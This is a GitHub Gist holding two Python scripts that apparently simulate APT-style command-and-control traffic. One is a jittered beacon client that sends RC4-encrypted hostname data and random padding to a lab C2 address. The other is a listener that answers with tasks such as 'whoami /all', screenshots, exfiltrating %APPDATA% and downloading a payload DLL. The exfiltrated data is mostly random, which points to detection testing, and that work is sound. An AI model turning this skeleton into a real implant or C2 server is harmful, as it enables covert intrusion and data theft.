Last active
November 21, 2025 15:25
-
-
Save justaguywhocodes/c09b8eff5ab02a22cfc26ea5dab920c5 to your computer and use it in GitHub Desktop.
rc4 encryption
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import time | |
| import random | |
| import string | |
| from arc4 import ARC4 | |
| # Configuration | |
| C2_SERVER = ('172.31.255.29', 443) # Change to your lab C2 IP | |
| KEY = b'APT38SecretKey2025!' | |
| BEACON_INTERVAL = 30 # seconds between beacons (average) | |
| JITTER = 0.4 # +/- 40% jitter | |
| MIN_PAYLOAD = 200 # bytes | |
| MAX_PAYLOAD = 8192 # bytes (simulates file exfil, screenshots, etc.) | |
| def random_payload(min_size, max_size): | |
| size = random.randint(min_size, max_size) | |
| payload = ''.join(random.choices(string.ascii_letters + string.digits + '/+', k=size)).encode() | |
| return payload | |
| arc4 = ARC4(KEY) | |
| while True: | |
| try: | |
| s = socket.socket() | |
| s.settimeout(10) | |
| s.connect(C2_SERVER) | |
| # Outbound beacon / staged exfil | |
| data_out = f"BEACON|{socket.gethostname()}|DOMAIN.LOCAL|{random.randint(1000,9999)}|" + ''.join(random.choices(string.printable, k=random.randint(50,500))) | |
| encrypted_out = arc4.encrypt(data_out.encode() + random_payload(MIN_PAYLOAD, MAX_PAYLOAD)) | |
| s.send(encrypted_out) | |
| # Receive and decrypt tasking (server may send large payload) | |
| response = s.recv(65535) | |
| if response: | |
| decrypted = ARC4(KEY).decrypt(response) # New ARC4 instance per-stream (correct RC4 behavior) | |
| print(f"[+] Received {len(response)} bytes → {decrypted[:200]}...") | |
| s.close() | |
| except Exception as e: | |
| print(f"[-] Connection failed: {e}") | |
| # Jittered sleep | |
| sleep_time = BEACON_INTERVAL * random.uniform(1 - JITTER, 1 + JITTER) | |
| time.sleep(sleep_time) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import time | |
| from arc4 import ARC4 # ← THIS WAS MISSING | |
| KEY = b'APT38SecretKey2025!' | |
| SERVER_IP = '172.31.255.29' | |
| PORT = 443 | |
| tasks = [ | |
| b"TASK: Run whoami /all", | |
| b"TASK: Screenshot", | |
| b"TASK: Exfil %APPDATA%\\*", | |
| b"TASK: Download http://c2.domain/payload.dll", | |
| b"IDLE", | |
| ] | |
| s = socket.socket() | |
| s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
| s.bind((SERVER_IP, PORT)) | |
| s.listen(50) | |
| print(f"[*] High-volume RC4 C2 listening on {SERVER_IP}:{PORT}") | |
| while True: | |
| try: | |
| client, addr = s.accept() | |
| print(f"[+] Implant connected from {addr[0]}") | |
| data = client.recv(65535) | |
| if not data: | |
| client.close() | |
| continue | |
| decrypted = ARC4(KEY).decrypt(data) | |
| print(f"[+] Decrypted ({len(data)} bytes): {decrypted[:200]}...") | |
| # Simulate occasional large downlink (payloads, updates, etc.) | |
| task = random.choice(tasks) | |
| if random.random() < 0.15: # 15% chance of large payload | |
| fake_payload = random.randbytes(random.randint(50000, 300000)) # 50–300 KB | |
| response = task + b'||PAYLOAD||' + fake_payload | |
| else: | |
| response = task + random.randbytes(random.randint(100, 2000)) | |
| encrypted_response = ARC4(KEY).encrypt(response) | |
| client.send(encrypted_response) | |
| client.close() | |
| except Exception as e: | |
| print(f"[-] Error: {e}") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment